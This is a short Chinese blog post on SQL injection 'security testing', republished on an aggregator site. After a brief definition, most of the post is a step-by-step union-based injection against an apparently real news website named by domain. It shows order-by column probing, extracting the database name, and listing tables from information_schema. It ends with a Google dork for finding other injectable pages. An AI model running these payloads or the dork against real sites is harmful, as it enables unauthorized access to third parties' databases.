美文网首页
安全测试-SQL注入

安全测试-SQL注入

作者: 繼續hug | 来源:发表于2017-04-27 16:08 被阅读0次

安全测试-SQL注入

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

e.g:

http://xian.gjnews.cn/list.php?page=4&id=524

探测是否有SQL注入的可能:

http://xian.gjnews.cn/list.php?page=4&id=524

http://xian.gjnews.cn/list.php?page=4&id=524order by 2

order by 2

order by 17

order by 17

order by 18

order by 18

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

and 1=2 union select 1,’ee’,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

and 1=2 union select

1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17可获取到数据库名称

获取数据库名称

http://xian.gjnews.cn/list.php?page=4&id=524 and 1=2 union

select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from

information_schema.tables where table_schema='gjnews_new'得到表ad

ad

http://xian.gjnews.cn/list.php?page=4&id=524 and 1=2 union

select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from

information_schema.tables where table_schema='gjnews_new' limit 1,1查第二个表

第二个表

inurl:php?id=


相关文章

  • 2020-07-29

    安全渗透测试-sql注入 总目标: 1、sql注入介绍 2、web安全渗透测试分类 3、sql注入原理 4、sql...

  • 21 web安全性测试用例2

    WEB的安全性测试主要从以下方面考虑: 1.SQL Injection(SQL注入) (1)如何进行SQL注入测试...

  • 前端安全

    web安全性测试 SQL注入 所谓SQL注入,就是通过把SQL命令插入到 Web表单提交 或输入域名或页面请求的查...

  • 安全测试-SQL注入

    安全测试-SQL注入 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查...

  • 安全测试_SQL注入

    1、SQL注入说明 应用为了和数据库进行沟通完成必要的管理和存储工作,必须和数据库保留一种接口。目前的数据库一般都...

  • 安全测试

    安全测试用例 常见的安全测试应该能够做到check以下内容 测试用例应该 包含每个HTTP参数的SQL注入测试 测...

  • SQL注入漏洞案例实践学习记录(2018.7-2018.8)

    一、SQL注入简述 SQL注入漏洞测试的方式总结 SQL注入常用的内置函数整理(以MySql为例) 二、测试环境&...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

  • [强网杯 2019] 随便注

    每天学习网络安全知识,本文记录强网杯的一个SQL注入题。 使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞...

  • 安全性测试

    安全性测试 • 认证与授权 • Session和cookie • 文件上传漏洞 • SQL 注入 • XSS 跨站...

网友评论

      本文标题:安全测试-SQL注入

      本文链接:https://www.haomeiwen.com/subject/blxnzttx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|安全测试-SQL注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!